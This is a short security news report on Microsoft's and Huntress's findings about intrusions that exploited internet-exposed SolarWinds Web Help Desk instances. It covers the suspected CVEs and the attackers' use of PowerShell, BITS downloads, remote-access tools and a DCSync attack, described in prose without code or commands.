Microsoft said it observed a sophisticated multi-stage cyber intrusion involving the exploitation of internet-exposed SolarWinds Web Help Desk (WHD) instances. According to the Microsoft Defender Security Research Team, threat actors used the compromised systems to gain initial access and laterally move across affected networks to high-value assets within the organization.
The company said it has yet to confirm which specific SolarWinds vulnerability was used in the attacks. The activity may have involved recently disclosed flaws tracked as CVE-2025-40551 and CVE-2025-40536, or a previously patched issue (CVE-2025-26399). Due to the intrusions occurring in December 2025 on systems vulnerable to both older and newer flaws, Microsoft said it could not reliably determine the exact entry point.
CVE-2025-40536 is described as a security control bypass that could allow unauthenticated access to restricted functionality, while CVE-2025-40551 and CVE-2025-26399 are untrusted data deserialization vulnerabilities that could enable remote code execution.
Microsoft said successful exploitation allowed attackers to execute arbitrary commands within the WHD application context. In the observed attacks, the compromised service spawned PowerShell and abused the Background Intelligent Transfer Service (BITS) to download and execute payloads. The attackers then deployed legitimate Zoho ManageEngine components to establish persistent remote access. In at least one incident, the threat actors carried out a DCSync attack, impersonating a domain controller to extract password hashes and other sensitive data from Active Directory.
Cybersecurity firm Huntress released a separate report detailing an intrusion involving SolarWinds Web Help Desk exploitation, in which the threat actor deployed Zoho Meetings and Cloudflare tunnels for persistence, as well as Velociraptor (a legitimate open-source digital forensics and incident response (DFIR) tool) for command and control.